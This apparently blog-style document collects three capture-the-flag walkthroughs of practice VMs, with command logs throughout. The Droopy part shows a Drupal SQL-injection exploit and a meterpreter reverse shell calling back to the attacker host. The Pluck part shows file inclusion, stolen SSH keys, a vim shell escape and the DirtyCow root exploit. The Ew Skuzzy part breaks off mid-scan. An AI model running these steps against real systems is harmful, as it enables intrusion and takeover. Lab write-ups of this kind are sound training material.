Droopy CTF VM Walkthrough

Today I’m trying to get into the Droopy CTF Virtual machine. I’ll be enuntiating the steps I did to solve it.

So the first step is to scan the network for its IP address.

Only the port 80 was opened.

http

By running nikto I found:

root@pss:~/ctf/droopyCTF# nikto -h http://192.168.1.35
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.35
+ Target Hostname:    192.168.1.35
+ Target Port:        80
+ Start Time:         2017-03-27 18:46:30 (GMT-3)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.5
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-generator' found, with contents: Drupal 7 (http://drupal.org)
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /scripts/: Directory indexing found.
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x60e 0x4fef78de7d280 
+ OSVDB-3268: /includes/: Directory indexing found.
+ Entry '/includes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /misc/: Directory indexing found.
+ Entry '/misc/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /modules/: Directory indexing found.
+ Entry '/modules/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /profiles/: Directory indexing found.
+ Entry '/profiles/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/scripts/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /themes/: Directory indexing found.
+ Entry '/themes/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.mysql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.pgsql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.sqlite.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/install.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/LICENSE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/MAINTAINERS.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/UPGRADE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/xmlrpc.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=filter/tips/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/password/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/register/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 36 entries which should be manually viewed.
+ Multiple index files found: /index.php, /index.html
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-3092: /web.config: ASP config file is accessible.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3092: /misc/: This might be interesting...
+ OSVDB-3092: /scripts/: This might be interesting... possibly a system shell found.
+ /info.php: Output from the phpinfo() function was found.
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3092: /UPGRADE.txt: Default file found.
+ OSVDB-3092: /install.php: Drupal install.php file found.
+ OSVDB-3092: /install.php: install.php file found.
+ OSVDB-3092: /LICENSE.txt: License file found may identify site software.
+ OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
+ OSVDB-3233: /INSTALL.mysql.txt: Drupal installation file found.
+ OSVDB-3233: /INSTALL.pgsql.txt: Drupal installation file found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /info.php?file=http://cirt.net/rfiinc.txt?: Output from the phpinfo() function was found.
+ OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
+ OSVDB-3268: /sites/: Directory indexing found.
+ 8383 requests: 0 error(s) and 52 item(s) reported on remote host
+ End Time:           2017-03-27 18:47:28 (GMT-3) (58 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

A “drupal 7” search on exploit-db gave me a bunch of options to try. I chosed this one:

https://www.exploit-db.com/exploits/34992/
root@pss:~/ctf/droopyCTF# python 34992.py -t http://192.168.1.35 -u admin -p admin

  ______                          __     _______  _______ _____    
 |   _  \ .----.--.--.-----.---.-|  |   |   _   ||   _   | _   |   
 |.  |   \|   _|  |  |  _  |  _  |  |   |___|   _|___|   |.|   |   
 |.  |    |__| |_____|   __|___._|__|      /   |___(__   `-|.  |   
 |:  1    /          |__|                 |   |  |:  1   | |:  |   
 |::.. . /                                |   |  |::.. . | |::.|   
 `------'                                 `---'  `-------' `---'   
  _______       __     ___       __            __   __             
 |   _   .-----|  |   |   .-----|__.-----.----|  |_|__.-----.-----.
 |   1___|  _  |  |   |.  |     |  |  -__|  __|   _|  |  _  |     |
 |____   |__   |__|   |.  |__|__|  |_____|____|____|__|_____|__|__|
 |:  1   |  |__|      |:  |    |___|                               
 |::.. . |            |::.|                                        
 `-------'            `---'                                        
                                                                   
                                 Drup4l => 7.0 <= 7.31 Sql-1nj3ct10n
                                              Admin 4cc0unt cr3at0r

			  Discovered by:

			  Stefan  Horst
                         (CVE-2014-3704)

                           Written by:

                         Claudio Viviani

                      http://www.homelab.it

                         info@homelab.it
                     homelabit@protonmail.ch

                 https://www.facebook.com/homelabit
                   https://twitter.com/homelabit
                 https://plus.google.com/+HomelabIt1/
       https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww


[!] VULNERABLE!

[!] Administrator user created!

[*] Login: admin
[*] Pass: admin
[*] Url: http://192.168.1.35/?q=node&destination=node

So now I have credentials to login and upload a reverse shell, let’s do so. But first I needed to make a little trick to allow php content to be ran by updating the PHP filter config and creating a page with php text format.

Logged in Enabling the php filter Added php code text format

I created a reverse shell with msfvenom as follows:

root@pss:~/ctf/droopyCTF# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.38 LPORT=6000 R > shell.txt 
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 948 bytes

And added the page to the site :)

Logged in

root@pss:~/ctf/droopyCTF# msfconsole 
                                                  

MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM                MMMMMMMMMM
MMMN$                           vMMMM
MMMNl  MMMMM             MMMMM  JMMMM
MMMNl  MMMMMMMN       NMMMMMMM  JMMMM
MMMNl  MMMMMMMMMNmmmNMMMMMMMMM  JMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMMMMMMMMMMMMMMMMMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMMM   MMMMMMM   MMMMM  jMMMM
MMMNI  MMMNM   MMMMMMM   MMMMM  jMMMM
MMMNI  WMMMM   MMMMMMM   MMMM#  JMMMM
MMMMR  ?MMNM             MMMMM .dMMMM
MMMMNm `?MMM             MMMM` dMMMMM
MMMMMMN  ?MM             MM?  NMMMMMN
MMMMMMMMNe                 JMMMMMNMMM
MMMMMMMMMMNm,            eMMMMMNMMNMM
MMMMNNMNMMMMMNx        MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
        http://metasploit.com


Payload caught by AV? Fly under the radar with Dynamic Payloads in
Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.13.21-dev                         ]
+ -- --=[ 1621 exploits - 924 auxiliary - 282 post        ]
+ -- --=[ 472 payloads - 39 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use 
Display all 3347 possibilities? (y or n)
msf > use p
Display all 754 possibilities? (y or n)
msf > use 
Display all 3347 possibilities? (y or n)Interrupt: use the 'exit' command to quit
msf > use exploit/multi/handler 
msf exploit(handler) > set payload phpInterrupt: use the 'exit' command to quit
msf exploit(handler) > use payload php/meterpreter/reverse_tcp

^C[-] Error while running command use: 
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.38
LHOST => 192.168.1.38
msf exploit(handler) > set LPORT 6000
LPORT => 6000
msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.38     yes       The listen address
   LPORT  6000             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > exploit 

[*] Started reverse TCP handler on 192.168.1.38:6000 
[*] Starting the payload handler...
[*] Sending stage (33986 bytes) to 192.168.1.35
[*] Meterpreter session 1 opened (192.168.1.38:6000 -> 192.168.1.35:46294) at 2017-03-27 20:17:45 -0300

meterpreter > shell
Process 1211 created.
Channel 1 created.

id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

python -c 'import pty; pty.spawn("/bin/bash");'
www-data@droopy:/var/www/html$ 
www-data@droopy:/var/www/html$ su gsuser
su gsuser
Password: gsuser

gsuser@droopy:/var/www/html$ su
su
Password: toor

root@droopy:/var/www/html# cd ~
cd ~
root@droopy:~# ls -la
ls -la
total 5148
drwx------  3 root root    4096 Apr 12  2016 .
drwxr-xr-x 22 root root    4096 Apr 10  2016 ..
-rw-r--r--  1 root root    3106 Feb 20  2014 .bashrc
drwx------  2 root root    4096 Apr 10  2016 .cache
-rw-r--r--  1 root root 5242880 Apr 12  2016 dave.tc
-rw-r--r--  1 root root     140 Feb 20  2014 .profile
-rw-------  1 root root    3771 Apr 11  2016 .viminfo

The main issue with this VM is that the passwords were too weak, a couple of tries for the gsuser, and after playing a bit with the root account I found it had the same default root password the kali images for BeagleBone and Rasberry, toor.

I copied dave.tc to the webroot, and downloaded it to my kali box.

Logged in

dave.tc is a TrueCrypt volume, so I cracked its password with truecrack -t dave.tc --wordlist dict.txt which took a hell of a time… The password was etonacademy.

Downloaded TrueCrypt from https://sourceforge.net/projects/truecrypt/files/TrueCrypt/Other/TrueCrypt-7.2-Linux-x86.tar.gz/download, and mounted the volume using the mentioned password…

Logged in

and… Done! Got the flag!

root@pss:~# cd /media/truecrypt1/
root@pss:/media/truecrypt1# ls -la
total 20
drwxr-xr-x 6 root root  1024 Apr 12  2016 .
drwxr-xr-x 4 root root  4096 Mar 28 17:30 ..
drwxr-xr-x 2 root root  1024 Apr 12  2016 buller
drwx------ 2 root root 12288 Apr 12  2016 lost+found
drwxr-xr-x 2 root root  1024 Apr 12  2016 panama
drwxr-xr-x 3 root root  1024 Apr 12  2016 .secret
root@pss:/media/truecrypt1# cat .secret/
piers.png  .top/
root@pss:/media/truecrypt1# cat .secret/.top/flag.txt 

################################################################################
#   ___ ___  _  _  ___ ___    _ _____ _   _ _      _ _____ ___ ___  _  _  ___  #
#  / __/ _ \| \| |/ __| _ \  /_\_   _| | | | |    /_\_   _|_ _/ _ \| \| |/ __| #
# | (_| (_) | .` | (_ |   / / _ \| | | |_| | |__ / _ \| |  | | (_) | .` |\__ \ #
#  \___\___/|_|\_|\___|_|_\/_/ \_\_|  \___/|____/_/ \_\_| |___\___/|_|\_||___/ #
#                                                                              #
################################################################################

Firstly, thanks for trying this VM. If you have rooted it, well done!

Shout-outs go to #vulnhub for hosting a great learning tool. A special thanks
goes to barrebas and junken for help in testing and final configuration.
                                                                    --knightmare
root@pss:/media/truecrypt1# 

Pluck1 CTF VM Walkthrough

Today I’m trying to own the Pluck 1 CTF VM

I started looking what was open:

root@pss:~/ctf/pluck# nmap -sV 192.168.1.115 -p 1-65535

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-03-23 17:52 ART
Nmap scan report for 192.168.1.115
Host is up (0.074s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
3306/tcp open  mysql   MySQL (unauthorized)
5355/tcp open  unknown
MAC Address: 2C:F0:EE:30:40:BE (Apple)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 179.50 seconds

As most CTFs. port 80 is the first place to look for a first clue.

http landing

The source code didn’t reaveal anything interesting but the URLs did:

Let me try something.. If I get the URL http://192.168.1.115/index.php?page=contact.php and that page param is loading a file called contact.php, I should also be able to hit http://192.168.1.115/contact.php and hit the same page. Let’s take a look….

OK!! It worked! So I only lost the CSS style that was inherited from the index.php page.

I also tested that it includes not only PHP files, but also any file in the server, like http://192.168.1.115/index.php?page=js/jquery.min.js which I knew it was there because of looking the landing page source.

JQuery fetched

Let’s try yo get to the / directory, I’m not sure how many folders we will need to get back, but we know from there we can get access to the server config file, normally at /etc/apache2/apache2.conf

Apache2conf

By looking the source code, it’s more human friendly.

Apache2conf

Eeeeasy, let’s get shadow! No shadow nor shadow- but passwd was there:

passwd file

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:109::/var/run/dbus:/bin/false
mysql:x:107:111:MySQL Server,,,:/nonexistent:/bin/false
lxd:x:108:65534::/var/lib/lxd/:/bin/false
uuidd:x:109:114::/run/uuidd:/bin/false
dnsmasq:x:110:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:111:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:112:1::/var/cache/pollinate:/bin/false
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
Debian-exim:x:113:119::/var/spool/exim4:/bin/false
peter:x:1001:1001:,,,:/home/peter:/bin/bash
paul:x:1002:1002:,,,:/home/paul:/usr/bin/pdmenu
backup-user:x:1003:1003:Just to make backups easier,,,:/backups:/usr/local/scripts/backup.sh

Ok, so we have root and several usernames to try:

root:x:0:0:root:/root:/bin/bash
bob:x:1000:1000:bob,,,:/home/bob:/bin/bash
peter:x:1001:1001:,,,:/home/peter:/bin/bash
paul:x:1002:1002:,,,:/home/paul:/usr/bin/pdmenu

The problem is that we have no passwords for them.

There is another user that called my attention:

backup-user:x:1003:1003:Just to make backups easier,,,:/backups:/usr/local/scripts/backup.sh

Let’s try to fetch that backup script file.

Script

The backup was pointing to a tar file, so let’s download it!

root@pss:~/ctf/pluck# wget http://192.168.1.115/index.php?page=../../../backups/backup.tar
--2017-03-23 18:55:00--  http://192.168.1.115/index.php?page=../../../backups/backup.tar
Connecting to 192.168.1.115:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: ‘index.php?page=..%2F..%2F..%2Fbackups%2Fbackup.tar.1’

e=..%2F..%2F..%2Fbackups%2     [                                <=>    ] 896.15M  --.-KB/s               ^C

root@pss:~/ctf/pluck# mv index.php\?page\=..%2F..%2F..%2Fbackups%2Fbackup.tar.1 backup.tar.1
root@pss:~/ctf/pluck# vim backup.tar.1
root@pss:~/ctf/pluck# mv backup.tar.1 backup.tar
root@pss:~/ctf/pluck# tar -xvf backup.tar 
home/
home/bob/
home/bob/.bashrc
home/bob/.sudo_as_admin_successful
home/bob/.profile
home/bob/.bash_logout
home/paul/
home/paul/keys/
home/paul/keys/id_key3.pub
home/paul/keys/id_key2.pub
home/paul/keys/id_key2
home/paul/keys/id_key4.pub
home/paul/keys/id_key5.pub
home/paul/keys/id_key6
home/paul/keys/id_key1
home/paul/keys/id_key5
home/paul/keys/id_key1.pub
home/paul/keys/id_key6.pub
home/paul/keys/id_key4
home/paul/keys/id_key3
home/paul/.bashrc
home/paul/.profile
home/paul/.bash_logout
home/peter/
home/peter/.bashrc
home/peter/.profile
home/peter/.bash_logout
var/www/html/
var/www/html/fonts/
var/www/html/fonts/glyphicons-halflings-regular.svg
var/www/html/fonts/glyphicons-halflings-regular.woff2
var/www/html/fonts/glyphicons-halflings-regular.ttf
var/www/html/fonts/glyphicons-halflings-regular.woff
var/www/html/fonts/glyphicons-halflings-regular.eot
var/www/html/about.php
var/www/html/index.php

By looking the tar contents closely, only paul seems to have a way in with some of his keys. So let’s try them.

root@pss:~/ctf/pluck/home/paul/keys# ssh -i id_key1 paul@192.168.1.115
paul@192.168.1.115's password: 

root@pss:~/ctf/pluck/home/paul/keys# ssh -i id_key2 paul@192.168.1.115
paul@192.168.1.115's password: 

root@pss:~/ctf/pluck/home/paul/keys# ssh -i id_key3 paul@192.168.1.115
paul@192.168.1.115's password: 

root@pss:~/ctf/pluck/home/paul/keys# ssh -i id_key4 paul@192.168.1.115

The fourth was the one! It was showing this pdmenu binary which allowed me to edit a file, opening vim.

edit file

Then, from vim, you could run:

:set shell=/bin/bash
:shell

This gave me a shell

root@pss:~/ctf/pluck/home/paul/keys# ssh -i id_key4 paul@192.168.1.115
Last login: Fri Mar 24 00:36:38 2017 from 192.168.1.38

paul@pluck:~$ whoami
paul
paul@pluck:~$ 

I did a search looking for files with the SUID

paul@pluck:~$ find / -perm -4000 2>/dev/null
/usr/exim/bin/exim-4.84-7
/usr/bin/passwd
/usr/bin/at
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/newgidmap
/usr/bin/chsh
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/s-nail/s-nail-privsep
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/bin/su
/bin/umount
/bin/mount
/bin/fusermount
/bin/ping
/bin/ntfs-3g

Searched exploits and found the best one to be DirtyCow, that exploits a linux kernel vulnerability. So I checked If I had gcc installed

paul@pluck:~$ gcc --version
gcc (Ubuntu 6.2.0-5ubuntu12) 6.2.0 20161005
Copyright (C) 2016 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

Then I got the dirty cow exploit

paul@pluck:~$ wget https://exploit-db.com/download/40616
--2017-03-24 01:41:18--  https://exploit-db.com/download/40616
Resolving exploit-db.com (exploit-db.com)... 192.124.249.8
Connecting to exploit-db.com (exploit-db.com)|192.124.249.8|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4965 (4.8K) [application/txt]
Saving to: ‘40616’

40616               100%[================>]   4.85K  --.-KB/s    in 0s      

2017-03-24 01:41:20 (612 MB/s) - ‘40616’ saved [4965/4965]

paul@pluck:~$ mv 40616 cow.c
paul@pluck:~$ vim cow.c 
paul@pluck:~$ gcc cow.c -o cow -pthread
cow.c: In function ‘procselfmemThread’:
cow.c:99:17: warning: passing argument 2 of ‘lseek’ makes integer from pointer without a cast [-Wint-conversion]
         lseek(f,map,SEEK_SET);
                 ^~~
In file included from cow.c:28:0:
/usr/include/unistd.h:337:16: note: expected ‘__off_t {aka long int}’ but argument is of type ‘void *’
 extern __off_t lseek (int __fd, __off_t __offset, int __whence) __THROW;
                ^~~~~
cow.c: In function ‘main’:
cow.c:136:5: warning: implicit declaration of function ‘asprintf’ [-Wimplicit-function-declaration]
     asprintf(&backup, "cp %s /tmp/bak", suid_binary);
     ^~~~~~~~
cow.c:140:5: warning: implicit declaration of function ‘fstat’ [-Wimplicit-function-declaration]
     fstat(f,&st);
     ^~~~~
cow.c:142:30: warning: format ‘%d’ expects argument of type ‘int’, but argument 2 has type ‘__off_t {aka long int}’ [-Wformat=]
     printf("Size of binary: %d\n", st.st_size);
            
                              ^

One of the big problems I had was that when running the exploit, I had only 1~2 seconds to operate before the CTF VM got completely freezed.

Researching I found this comment about running echo 0 > /proc/sys/vm/dirty_writeback_centisecs to make the dirtycow exploit work properly.

So I copied, and as soon as I got shell, I pasted and ran the command. Then, was just going to the root folder to find the flag.

paul@pluck:~$ ./cow 
DirtyCow root privilege escalation
Backing up /usr/bin/passwd.. to /tmp/bak
Size of binary: 54256
Racing, this may take a while..
thread stopped
thread stopped
/usr/bin/passwd is overwritten
Popping root shell.
Don't forget to restore /tmp/bak
root@pluck:/home/paul# echo 0 > /proc/sys/vm/dirty_writeback_centisecs
root@pluck:/home/paul# cd /root
root@pluck:/root# ls
flag.txt
root@pluck:/root# cat flag.txt 

Congratulations you found the flag

---------------------------------------

######   ((((((((((((((((((((((((((((((
#########   (((((((((((((((((((((((((((
,,##########   ((((((((((((((((((((((((
@@,,,##########   (((((((((((((((((((((
@@@@@,,,##########                     
@@@@@@@@,,,############################
@@@@@@@@@@@,,,#########################
@@@@@@@@@,,,###########################
@@@@@@,,,##########                    
@@@,,,##########   &&&&&&&&&&&&&&&&&&&&
,,,##########   &&&&&&&&&&&&&&&&&&&&&&&
##########   &&&&&&&&&&&&&&&&&&&&&&&&&&
#######   &&&&&&&&&&&&&&&&&&&&&&&&&&&&&

root@pluck:/root# 


Thats all falks!

Ew Skuzzy CTF Walkthrough

Note: You'll notice the target IP swtiches from 192.168.1.37 to 192.168.1.35. This is because it took me 2 days to solve the CTF and I shutdown the VM.

This time I tried with a fairly new CTF VM, it was the Ew Skuzzy

I started by triggering an nmap to see what was open:

# nmap -sV 192.168.1.37 -p 1-65535

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2017-03-20 21:38 ART
Nmap scan report for 192.168.1.37
Host is up (0.0019s latency).
Not shown: 65532 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http    nginx
3260/tcp open  iscsi?
MAC Address: 2C:F0:EE:30:40:BE (Apple)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 446.20 seconds

I took a look at the http server to know what was going on in there:

http

Then I triggered dirb to find some folders as:

# dirb http://192.168.1.37

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Mar 20 22:11:26 2017
URL_BASE: http://192.168.1.37/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

                                                                          GENERATED WORDS: 4612

---- Scanning URL: http://192.168.1.37/ ----
                                                                          + http://192.168.1.37/index.html (CODE:200|SIZE:1297)                    
                                                                          ==> DIRECTORY: http://192.168.1.37/smblogin/
                                                                         
---- Entering directory: http://192.168.1.37/smblogin/ ----
                                                                                                                                                    ==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/
                                                                         
---- Entering directory: http://192.168.1.37/smblogin/custom-log/ ----
                                                                                                                                                    ==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/
                                                                         
---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/ ----
                                                                                                                                                    ==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/
                                                                         
---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/ ----
                                                                                                                                                    ==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/
                                                                         
---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/ ----
                                                                                                                                                    ==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/
                                                                         
---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/ ----
                                                                                                                                                      ==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/
                                                                         
---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/ ----
                                                                                                                                                      ==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/
                                                                         
---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/ ----
                                                                                                                                                      ==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/
                                                                         
---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/ ----
                                                                                                                                                      ==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/
                                                                         
---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/ ----
                                                                                                                                                      ==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/
                                                                         
---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/ ----
                                                                                                                                                      ==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/
                                                                         
---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/ ----
                                                                                                                                                      ==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/
                                                                         
---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/ ----
                                                                                                                                                      ==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/
                                                                         
---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/ ----
                                                                                                                                                      ==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/
                                                                         
---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/ ----
                                                                                                                                                      ==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/
                                                                         
---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/ ----
                                                                                                                                                      ==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/
                                                                         
---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/ ----
                                                                                                                                                      ==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/month/
                                                                         
---- Entering directory: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/month/ ----
                                                                                                                                                      ==> DIRECTORY: http://192.168.1.37/smblogin/custom-log/refer/del/arquivos/_archive/autodeploy/Links/pdf/portals/images3/forgotpassword/tuscany/send-password/catalog/tell_friend/queues/month/checking/
                                                                         
